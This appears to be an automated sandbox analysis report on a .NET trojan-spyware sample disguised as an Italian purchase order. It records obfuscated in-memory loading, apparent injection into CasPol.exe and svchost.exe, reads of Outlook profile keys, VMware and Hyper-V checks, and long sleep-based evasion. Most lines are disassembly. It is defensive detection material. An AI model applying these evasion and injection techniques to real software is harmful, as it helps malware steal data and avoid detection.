          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/2@13/8
          Source: Requisito ordine n. 230210.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3788:120:WilError_01
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Requisito ordine n. 230210.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Requisito ordine n. 230210.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Requisito ordine n. 230210.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdbBSJB source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdb source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: NNbBbB.pdb source: Requisito ordine n. 230210.exe

          Data Obfuscation

          Source: Requisito ordine n. 230210.exe, program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeCode function: 0_2_0000022275059A96 push 28000001h; iretd 0_2_0000022275059AA1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E84A push ebx; retf 555Dh1_2_0041E851
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004090EC push ebx; retf 1_2_004090F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004118B6 push edi; iretd 1_2_004118CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004101C4 push ss; retf 1_2_004101CE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041B4E3 pushad ; ret 1_2_0041B4EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00401D80 push eax; ret 1_2_00401D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00408DB6 push ebx; retf 1_2_00408DB9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00411654 push esi; ret 1_2_00411656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00405E83 push esi; ret 1_2_00405E8E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00408F31 push esp; retf 1_2_00408F43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0167D0D1 push ecx; ret 1_2_0167D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0327D0D1 push ecx; ret 11_2_0327D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3CAC7 push ebx; retf 555Dh11_2_02C3CACE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C27369 push ebx; retf 11_2_02C27374
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C27033 push ebx; retf 11_2_02C27036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C271AE push esp; retf 11_2_02C271C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C24100 push esi; ret 11_2_02C2410B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C39760 pushad ; ret 11_2_02C39767
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C2E441 push ss; retf 11_2_02C2E44B
          Source: Requisito ordine n. 230210.exeStatic PE information: 0xD115FA56 [Thu Feb 27 10:41:26 2081 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.896625540706908
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: '.cctor', 'gcXExg6wxEuIJ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB', 'ubAof6RgCm', 'YpJoWsPi7X', 'BEVodWAYPB', 'gX8onkMSd7', 'PEXoCqmS4w'
          Source: Requisito ordine n. 230210.exe, fQosxZ2k0KXs2yyDcFA/XliSbN2oAPxhVpUoRhK.csHigh entropy of concatenated method names: 'yP9kTyWRjv', 'eBxqprrF8', 'dLNk983wBy', '.ctor', 'OVD4Ze80Ue1Ox', '.cctor', 'NfHwGwGa299bi2xaZA', 'U6RoZ4loWEPrAhYiSQ', 'Ic2F5Z1mkUy211AcSh', 'O2ttQnQGpuPhYt90FA'
          Source: Requisito ordine n. 230210.exe, oRZtxCaSAYh6EEGEIZ/Idt5pgryuYoFVQiX6j.csHigh entropy of concatenated method names: 'KQSExg66e8m16', '.ctor', '.cctor', 'uY4k17DN8Q1uQcdicL', 'FNhmljpUBs3wxLXG5o', 'SDgIq9TR5MNvD9UXoi', 'OmSQ0EWCrM8owpZ2MU', 'NFSSg14MICyNkWgRGo', 'mJov3MrDsjqT8BMOkD', 'glDqmcRxRL13RR44J0'
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe TID: 5836 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 4988 Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F5BA5 rdtsc 1_2_016F5BA5
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 861
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 887
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.8 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 8.3 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C331F0 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C331E9 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331E9
          Source: explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000002.00000003.475379307.000000000F367000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.534189613.000000000F392000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.476622654.000000000F391000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000002.528117624.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000002.532424713.0000000009185000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.476490167.0000000009184000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.490833568.0000000009185000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000002.00000000.292892221.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000002.00000003.475884450.000000000509E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000002.00000000.292892221.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E49A4 mov eax, dword ptr fs:[00000030h]1_2_016E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E49A4 mov eax, dword ptr fs:[00000030h]1_2_016E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A69A6 mov eax, dword ptr fs:[00000030h]1_2_016A69A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A51BE mov eax, dword ptr fs:[00000030h]1_2_016A51BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov ecx, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF mov eax, dword ptr fs:[00000030h]1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A185 mov eax, dword ptr fs:[00000030h]1_2_0165A185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164C182 mov eax, dword ptr fs:[00000030h]1_2_0164C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652990 mov eax, dword ptr fs:[00000030h]1_2_01652990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F1074 mov eax, dword ptr fs:[00000030h]1_2_016F1074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2073 mov eax, dword ptr fs:[00000030h]1_2_016E2073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01640050 mov eax, dword ptr fs:[00000030h]1_2_01640050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01640050 mov eax, dword ptr fs:[00000030h]1_2_01640050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165002D mov eax, dword ptr fs:[00000030h]1_2_0165002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B02A mov eax, dword ptr fs:[00000030h]1_2_0163B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A830 mov eax, dword ptr fs:[00000030h]1_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F4015 mov eax, dword ptr fs:[00000030h]1_2_016F4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F4015 mov eax, dword ptr fs:[00000030h]1_2_016F4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7016 mov eax, dword ptr fs:[00000030h]1_2_016A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7016 mov eax, dword ptr fs:[00000030h]1_2_016A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7016 mov eax, dword ptr fs:[00000030h]1_2_016A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B8E4 mov eax, dword ptr fs:[00000030h]1_2_0164B8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B8E4 mov eax, dword ptr fs:[00000030h]1_2_0164B8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016240E1 mov eax, dword ptr fs:[00000030h]1_2_016240E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016240E1 mov eax, dword ptr fs:[00000030h]1_2_016240E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016240E1 mov eax, dword ptr fs:[00000030h]1_2_016240E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016258EC mov eax, dword ptr fs:[00000030h]1_2_016258EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BB8D0 mov eax, dword ptr fs:[00000030h]1_2_016BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A0 mov eax, dword ptr fs:[00000030h]1_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016690AF mov eax, dword ptr fs:[00000030h]1_2_016690AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165F0BF mov ecx, dword ptr fs:[00000030h]1_2_0165F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165F0BF mov eax, dword ptr fs:[00000030h]1_2_0165F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165F0BF mov eax, dword ptr fs:[00000030h]1_2_0165F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629080 mov eax, dword ptr fs:[00000030h]1_2_01629080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A3884 mov eax, dword ptr fs:[00000030h]1_2_016A3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A3884 mov eax, dword ptr fs:[00000030h]1_2_016A3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162DB60 mov ecx, dword ptr fs:[00000030h]1_2_0162DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01653B7A mov eax, dword ptr fs:[00000030h]1_2_01653B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01653B7A mov eax, dword ptr fs:[00000030h]1_2_01653B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162DB40 mov eax, dword ptr fs:[00000030h]1_2_0162DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8B58 mov eax, dword ptr fs:[00000030h]1_2_016F8B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162F358 mov eax, dword ptr fs:[00000030h]1_2_0162F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E131B mov eax, dword ptr fs:[00000030h]1_2_016E131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
